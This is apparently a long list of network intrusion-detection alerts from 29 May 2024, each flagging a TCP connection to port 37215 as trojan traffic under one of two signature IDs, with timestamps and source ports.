                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726350
                SID:2829579
                Source Port:49628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362912
                SID:2835222
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321717
                SID:2829579
                Source Port:51286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868815
                SID:2829579
                Source Port:36172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076433
                SID:2835222
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902104
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222716
                SID:2829579
                Source Port:43200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430900
                SID:2829579
                Source Port:35606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667760
                SID:2829579
                Source Port:60074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441600
                SID:2835222
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264648
                SID:2835222
                Source Port:35850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916879
                SID:2829579
                Source Port:51476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841499
                SID:2835222
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896400
                SID:2829579
                Source Port:36672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651649
                SID:2829579
                Source Port:34162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536103
                SID:2835222
                Source Port:52740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789338
                SID:2829579
                Source Port:46852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160924
                SID:2835222
                Source Port:35332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453543
                SID:2835222
                Source Port:51942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628915
                SID:2835222
                Source Port:45614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209859
                SID:2829579
                Source Port:36668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270376
                SID:2829579
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614134
                SID:2829579
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860381
                SID:2829579
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083600
                SID:2835222
                Source Port:49702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669032
                SID:2829579
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141147
                SID:2829579
                Source Port:60772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810549
                SID:2829579
                Source Port:47270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.167415
                SID:2835222
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042801
                SID:2835222
                Source Port:49528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842182
                SID:2829579
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717107
                SID:2835222
                Source Port:39904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137835
                SID:2829579
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521849
                SID:2829579
                Source Port:50812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286906
                SID:2835222
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240258
                SID:2835222
                Source Port:38660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800505
                SID:2835222
                Source Port:58364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653895
                SID:2835222
                Source Port:48772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914943
                SID:2829579
                Source Port:39002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326049
                SID:2829579
                Source Port:41326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732253
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968433
                SID:2829579
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896023
                SID:2835222
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084738
                SID:2829579
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135938
                SID:2835222
                Source Port:40824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325386
                SID:2829579
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992773
                SID:2835222
                Source Port:41966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2835222
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597384
                SID:2835222
                Source Port:49872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227995
                SID:2835222
                Source Port:48664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726209
                SID:2829579
                Source Port:45890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882829
                SID:2835222
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088413
                SID:2829579
                Source Port:52228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145064
                SID:2829579
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787482
                SID:2829579
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824660
                SID:2835222
                Source Port:41512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715591
                SID:2835222
                Source Port:48520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071589
                SID:2829579
                Source Port:47618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429142
                SID:2835222
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821251
                SID:2829579
                Source Port:33886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014941
                SID:2829579
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740251
                SID:2835222
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781459
                SID:2829579
                Source Port:38078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796639
                SID:2829579
                Source Port:52826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111080
                SID:2829579
                Source Port:53784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288469
                SID:2829579
                Source Port:52458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100949
                SID:2829579
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654572
                SID:2829579
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587014
                SID:2835222
                Source Port:53150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855788
                SID:2829579
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372041
                SID:2829579
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805983
                SID:2835222
                Source Port:42502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417370
                SID:2835222
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979454
                SID:2829579
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441975
                SID:2829579
                Source Port:51696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217111
                SID:2835222
                Source Port:58626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915768
                SID:2829579
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531692
                SID:2835222
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504281
                SID:2829579
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269968
                SID:2829579
                Source Port:49836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869378
                SID:2835222
                Source Port:34674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852127
                SID:2835222
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287070
                SID:2835222
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472950
                SID:2835222
                Source Port:38988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378785
                SID:2829579
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782101
                SID:2829579
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843446
                SID:2829579
                Source Port:43882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223922
                SID:2835222
                Source Port:57960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.978013
                SID:2829579
                Source Port:41270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873559
                SID:2835222
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675222
                SID:2835222
                Source Port:45546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587188
                SID:2829579
                Source Port:41148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586784
                SID:2835222
                Source Port:33906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287679
                SID:2829579
                Source Port:36302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514332
                SID:2835222
                Source Port:44964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569613
                SID:2829579
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225155
                SID:2829579
                Source Port:34808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.945047
                SID:2829579
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907473
                SID:2829579
                Source Port:46498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261771
                SID:2835222
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617155
                SID:2835222
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266948
                SID:2829579
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881246
                SID:2835222
                Source Port:49848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025641
                SID:2835222
                Source Port:37932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237545
                SID:2829579
                Source Port:44348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899215
                SID:2835222
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140985
                SID:2829579
                Source Port:39016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583579
                SID:2829579
                Source Port:40476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944722
                SID:2829579
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615356
                SID:2829579
                Source Port:45942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465483
                SID:2835222
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989719
                SID:2835222
                Source Port:53606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265565
                SID:2835222
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000937
                SID:2835222
                Source Port:43870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659700
                SID:2829579
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432999
                SID:2829579
                Source Port:52360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419371
                SID:2835222
                Source Port:38866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899294
                SID:2829579
                Source Port:47964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042407
                SID:2829579
                Source Port:42980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227266
                SID:2835222
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264506
                SID:2829579
                Source Port:48262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960380
                SID:2835222
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842263
                SID:2829579
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363317
                SID:2835222
                Source Port:47550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586017
                SID:2835222
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.078407
                SID:2835222
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963145
                SID:2829579
                Source Port:42822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910963
                SID:2835222
                Source Port:33068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858276
                SID:2835222
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113398
                SID:2829579
                Source Port:51160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517832
                SID:2835222
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073597
                SID:2829579
                Source Port:47304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965489
                SID:2829579
                Source Port:35886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178474
                SID:2835222
                Source Port:33298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652205
                SID:2829579
                Source Port:57688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358718
                SID:2835222
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778345
                SID:2829579
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976205
                SID:2835222
                Source Port:57972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133695
                SID:2835222
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161129
                SID:2829579
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.616626
                SID:2829579
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179017
                SID:2829579
                Source Port:56780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135796
                SID:2829579
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170525
                SID:2835222
                Source Port:39996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072447
                SID:2835222
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860229
                SID:2829579
                Source Port:49388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564804
                SID:2829579
                Source Port:40870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782525
                SID:2835222
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898375
                SID:2835222
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651815
                SID:2835222
                Source Port:33256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282172
                SID:2829579
                Source Port:51156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962238
                SID:2829579
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788497
                SID:2835222
                Source Port:50048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715301
                SID:2829579
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767551
                SID:2829579
                Source Port:49710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817041
                SID:2835222
                Source Port:44578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869411
                SID:2829579
                Source Port:51296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802276
                SID:2835222
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334732
                SID:2829579
                Source Port:49160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109136
                SID:2829579
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177438
                SID:2829579
                Source Port:58074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782492
                SID:2829579
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023309
                SID:2829579
                Source Port:43602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966221
                SID:2829579
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419451
                SID:2829579
                Source Port:46564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997326
                SID:2829579
                Source Port:43098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088550
                SID:2829579
                Source Port:37592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455139
                SID:2835222
                Source Port:52674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670616
                SID:2835222
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526516
                SID:2835222
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784743
                SID:2835222
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668678
                SID:2835222
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694640
                SID:2829579
                Source Port:53726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781296
                SID:2835222
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726962
                SID:2835222
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521226
                SID:2829579
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967016
                SID:2835222
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984585
                SID:2835222
                Source Port:55082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652815
                SID:2835222
                Source Port:58078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522397
                SID:2835222
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967520
                SID:2829579
                Source Port:33058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920120
                SID:2829579
                Source Port:47662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072320
                SID:2829579
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971541
                SID:2835222
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461383
                SID:2835222
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038171
                SID:2835222
                Source Port:38850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899309
                SID:2835222
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266505
                SID:2835222
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611272
                SID:2829579
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767090
                SID:2829579
                Source Port:44950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552210
                SID:2829579
                Source Port:33958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817199
                SID:2829579
                Source Port:57664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667521
                SID:2835222
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706343
                SID:2835222
                Source Port:51194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325968
                SID:2829579
                Source Port:40060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363187
                SID:2835222
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428361
                SID:2835222
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
